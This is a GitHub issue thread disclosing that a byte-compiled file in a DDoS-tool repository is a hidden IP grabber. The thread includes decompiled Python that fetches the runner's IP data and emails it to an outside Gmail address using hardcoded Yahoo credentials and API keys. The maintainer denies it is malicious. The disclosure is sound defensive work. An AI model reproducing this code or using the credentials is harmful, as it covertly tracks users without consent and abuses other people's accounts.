### ISSUE TITLE
serv.ip IP Grabber

### ISSUE THREAD

**Issue by murphy60dotcom** [mishakorzik/Ultra-DDos#3]
[serv.py](https://github.com/mishakorzik/Ultra-DDos/blob/f2856d4742089315288265e79a7287a9356ff6a6/src/serv.py) is an ip grabber. This is what it does when decompiled.

Do not run this code.

```python
# Source Generated with Decompyle++
# File: serv.py (Python 3.10)

import smtplib
import requests
import random
user = 'examples0jk@yahoo.com'
pwd = 'stcbaqzrlpmdnwnl'
ipdata_list = [
    'https://api.ipdata.co/?api-key=6818a70bf0dcdbf1dd6bf89e62299740a49725ac65ff8e4056e3b343',
    'https://api.ipdata.co/?api-key=7d9bf69a54c63b6f9274c6074b2f50aee46208d10a33533452add840',
    'https://api.ipdata.co/?api-key=6453632fcabd2a4c2de4bb45ab35254594fd719e61d58bacde4429f0',
    'https://api.ipdata.co/?api-key=6aed0320c458287bdc453ce543c6edc565fd098eda4a79f7e41b3b61']
ipdata = random.choice(ipdata_list)
body = requests.get(ipdata).text
message = 'Subject: Log\n\n' + body
server = smtplib.SMTP('smtp.mail.yahoo.com', 587)
server.starttls()
server.login(user, pwd)
server.sendmail(user, 'miguardzecurity@gmail.com', message)
```

Delete this, it is NOT okay to do this without user consent or knowledge, and to obfuscate it by byte-compiling file to hide from users what is really going on.

There are many also in other repositories you have created:

- https://github.com/mishakorzik/IpHack/blob/1926ce64d8711f739660bc93929764dc3ebfc41a/src/serv.py
- https://github.com/mishakorzik/py-ddoser/blob/31df6044fe8382b8e804ff030bd188c5e0ee9089/src/serv.py

**Comment by mishakorzik** [comment]
🤦it's not a grabber, it's for logs and it was turned off a long time ago and it wasn't working, it was for a test
